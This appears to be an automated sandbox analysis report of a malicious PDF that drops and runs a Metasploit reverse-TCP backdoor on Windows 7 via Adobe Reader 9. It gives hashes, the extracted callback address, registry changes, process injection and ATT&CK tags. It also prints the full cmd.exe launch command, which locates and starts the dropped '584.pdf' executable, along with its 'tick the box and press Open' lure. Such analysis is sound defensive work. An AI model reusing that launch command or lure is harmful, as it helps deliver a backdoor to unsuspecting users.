metasploit | 9bc5d6c3ffd6586036ed34e35a7f32e9c4b71d4d05d9b0d645ea792cb0257dea

Analysis

max time kernel
139s
max time network
154s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
24-12-2024 13:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

53373bad4e9ebce6d133cf2f08bce78a523bb2faf40840d7d3a7c0fe24dec027.pdf
Size

300KB
MD5

6e38c1f164bfc763d444c39fe4e165b0
SHA1

5c4151862bb052a50e4588d7be35a9a5ea6b16cf
SHA256

53373bad4e9ebce6d133cf2f08bce78a523bb2faf40840d7d3a7c0fe24dec027
SHA512

cfab07afb8ca14fcac97cc4564130e88a7de4d885234b920dc3e5c8122d97c1881ca5b92761861d7d3c9479800ef5e973efffc24caacbcbe2be1ff85141381c7
SSDEEP

6144:po8OtPgMX+Pu8SW8cjTnpVJg3qtD8AWuvdBYm5gTK0:iPgCSVSXc3pzPtD1Wuv3ge0

Score

10^/10

metasploit backdoor discovery trojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

192.168.10.70:4444

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Executes dropped EXE 1 IoCs

pid	Process
1380	584.pdf

Loads dropped DLL 2 IoCs

pid	Process
2928	cmd.exe
2928	cmd.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	584.pdf

Modifies registry class 31 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy	AcroRd32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}"	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	AcroRd32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Mode = "4"	AcroRd32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\LogicalViewMode = "1"	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	AcroRd32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}	AcroRd32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1"	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	AcroRd32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}"	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags	AcroRd32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\TV_TopViewVersion = "0"	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Sort = 000000000000000000000000000000000200000030f125b7ef471a10a5f102608c9eebac0a0000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	AcroRd32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\IconSize = "16"	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	AcroRd32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1092616257"	AcroRd32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2328	AcroRd32.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2328	AcroRd32.exe
2328	AcroRd32.exe
2328	AcroRd32.exe
2328	AcroRd32.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2328 wrote to memory of 2928	2328	AcroRd32.exe	29
PID 2328 wrote to memory of 2928	2328	AcroRd32.exe	29
PID 2328 wrote to memory of 2928	2328	AcroRd32.exe	29
PID 2328 wrote to memory of 2928	2328	AcroRd32.exe	29
PID 2928 wrote to memory of 1380	2928	cmd.exe	31
PID 2928 wrote to memory of 1380	2928	cmd.exe	31
PID 2928 wrote to memory of 1380	2928	cmd.exe	31
PID 2928 wrote to memory of 1380	2928	cmd.exe	31

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\53373bad4e9ebce6d133cf2f08bce78a523bb2faf40840d7d3a7c0fe24dec027.pdf"
1⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2328
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\584.pdf" (cd "Desktop"))&(if exist "My Documents\584.pdf" (cd "My Documents"))&(if exist "Documents\584.pdf" (cd "Documents"))&(if exist "Escritorio\584.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\584.pdf" (cd "Mis Documentos"))&(start 584.pdf) To view the encrypted content please tick the "Do not show this message again" box and press Open.
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2928
- - \??\c:\Users\Admin\Documents\584.pdf
    584.pdf
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1380

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
7c5d5f42664922a799e4fda736850682

SHA1
ae4661ece8bac0b0c2282c37ce418c3899e83372

SHA256
439f02a2c9c9d4dc13b7dc9ba8fad410f05d390ada56bb3e509fa33277568c52

SHA512
71e84c30c22eaca19e591ae4fd5a602aec45f44d040e7bd87a2e7096fcc50c4027ac7825612e60d5c6003f85a2859f904540cbe93f10649a3f8245a8e4b1bce8

Download Submit
\??\c:\Users\Admin\Documents\584.pdf

Filesize
72KB

MD5
861e43667d84d76bff05868a9d4de52e

SHA1
643167f1ab323b376c017241131d5372a3c3c158

SHA256
560ac90f2c486d526cbb6e56cb9fe10e5c354c17d6b232c9dd67cfeac78b8119

SHA512
71d0033530850e76c961d4163a1b6edb5d9963ad5c4f633824e04794636978c759026f8ee36c94dea100d454f94b5c9b4870da9e4b2920ae0ed650f54429cf14

Download Submit